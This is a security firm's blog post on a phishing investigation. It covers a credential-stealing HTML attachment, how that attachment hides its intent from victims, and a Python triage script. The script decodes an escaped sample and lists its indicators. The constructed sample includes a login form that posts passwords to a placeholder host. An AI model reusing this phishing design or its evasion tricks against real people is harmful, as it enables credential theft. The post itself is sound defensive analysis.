
Active Threat Investigations - June 2021

Posted by MegaplanIT on 6/9/21 11:38 AM

Credential Stealing Email Located

We recently ran a phishing investigation into an email with an HTML attachment that caught our eye, because Microsoft had just published details of an ongoing NOBELIUM campaign that used a similar delivery technique. The NOBELIUM chain was: phishing email > HTML attachment > HTML smuggling > an ISO written to disk, containing an LNK file that executes the Cobalt Strike Beacon loader. There is more to it than that, but the HTML smuggling step is where this attack's path diverged, luckily.


After we obtained the email from the client, we dug into what was going on inside the HTML attachment. The HTML was "obfuscated", though all the author had really done was escape the characters of the document, the same kind of encoding that is common in web requests. Decoding it back to plaintext was trivial, and from there we started digging into the functionality.



There were quite a few interesting things to note in this campaign. The adversary took care not to tip the user off that their credentials were being stolen. If the user reloaded the page more than three times, it displayed "Scanned File Locked! Redirecting you back to your account" and sent them back to Outlook. It also prompted for the password twice, reporting it as wrong each time (a smart touch, since many people mistype their password on the first try), and on the third attempt displayed "Scanned File Locked" and redirected the user to their Outlook page, with each submission still going to the attacker. The JavaScript on the page also dynamically pulled the targeted company's logo from a third-party website, keyed on the domain of the targeted user's address, to make the page even more convincing. The website the credentials are sent to was created on 5-19-2021 and hosts a default WordPress page with no content. We have reported the site to the hosting provider and are waiting for it to be taken down.
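The two analysis steps above, decoding an escaped HTML attachment and then pulling out where it posts credentials and which hosts it contacts, are the part of this kind of investigation that is worth automating. The script below is an added example, not MegaplanIT's tooling and not the attachment from this case: it takes a constructed attachment that hands a percent-escaped payload to unescape()/document.write(), decodes it, and reports the form action (the exfiltration URL), loaded resources such as the logo image, URLs referenced from script (the redirect back to Outlook), password fields and the set of hosts involved. All hostnames in the sample are placeholders.

```python
"""Triage helper for a percent-escaped HTML phishing attachment: recover the
HTML the browser would render and list the network indicators in it.
Added example with constructed input, not the attachment from this case."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Calls whose string argument is a percent-escaped payload.
ESCAPED_CALL = re.compile(
    r'(?:unescape|decodeURIComponent|decodeURI)\(\s*(["\'])(.*?)\1\s*\)', re.S)
# Absolute URLs anywhere in text (catches location.href = "..." in scripts).
URL_IN_TEXT = re.compile(r'https?://[^\s"\'<>()]+')

# Constructed sample attachment. Hostnames are placeholders, not indicators
# from the investigation. Decoded, the payload is a login form posting to
# exfil.example, a logo image from logo.example, and a script that redirects
# to outlook.office.com once the attempt counter passes two.
SAMPLE_ATTACHMENT = (
    '<html><body><script>document.write(unescape("'
    '%3Cform%20id%3D%22login%22%20method%3D%22POST%22%20'
    'action%3D%22https%3A%2F%2Fexfil.example%2Fwp-content%2Fpost.php%22%3E'
    '%3Cimg%20src%3D%22https%3A%2F%2Flogo.example%2Ftarget.example%22%3E'
    '%3Cinput%20name%3D%22email%22%3E'
    '%3Cinput%20type%3D%22password%22%20name%3D%22pw%22%3E'
    '%3C%2Fform%3E%3Cscript%3Evar%20tries%3D0%3B%20if(tries%3E2)%7B'
    'location.href%3D%22https%3A%2F%2Foutlook.office.com%22%3B%7D%3C%2Fscript%3E'
    '"))</script></body></html>'
)


def decode_escaped_payloads(html: str) -> list[str]:
    """Return the decoded argument of every unescape()/decodeURI*() call.
    If the file has no such call but is itself percent-encoded, decode the
    whole file instead. One layer only: re-run on the output if it still
    contains escaped calls (kits sometimes nest them)."""
    payloads = [unquote(m.group(2)) for m in ESCAPED_CALL.finditer(html)]
    if payloads:
        return payloads
    whole = unquote(html)
    return [whole] if whole != html else []


class IndicatorParser(HTMLParser):
    """Collects form targets, fetched resources and password fields."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.resources, self.password_fields = [], [], 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        src_attr = "href" if tag == "link" else "src"
        if tag in ("img", "script", "iframe", "link") and a.get(src_attr):
            self.resources.append(a[src_attr])
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1


def triage(html: str) -> dict:
    """Decode the attachment and summarise where it posts to, what it loads,
    which other URLs its script references and which hosts it talks to."""
    report = {"form_actions": [], "resources": [], "other_urls": [],
              "password_fields": 0, "hosts": set()}
    for payload in decode_escaped_payloads(html) or [html]:
        p = IndicatorParser()
        p.feed(payload)
        report["form_actions"] += p.form_actions
        report["resources"] += p.resources
        report["password_fields"] += p.password_fields
        for url in URL_IN_TEXT.findall(payload):
            if url not in p.form_actions and url not in p.resources:
                report["other_urls"].append(url)
        for url in p.form_actions + p.resources + report["other_urls"]:
            host = urlparse(url).hostname
            if host:
                report["hosts"].add(host)
    report["hosts"] = sorted(report["hosts"])
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```

Run it against a real attachment by reading the file into triage(); the form action and the script-referenced URLs are the indicators to block and report, and any host in the list that is not the user's own mail provider deserves a registration-date check like the one above. A report with zero password fields and no form action is a hint that the credential form is built at runtime by further script, in which case the decoded payload needs another pass.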




We found no evidence of malware or dropper functionality inside the HTML file, so our recommendation was to reset the affected users' passwords.





Topics: Insider, Managed Security Services
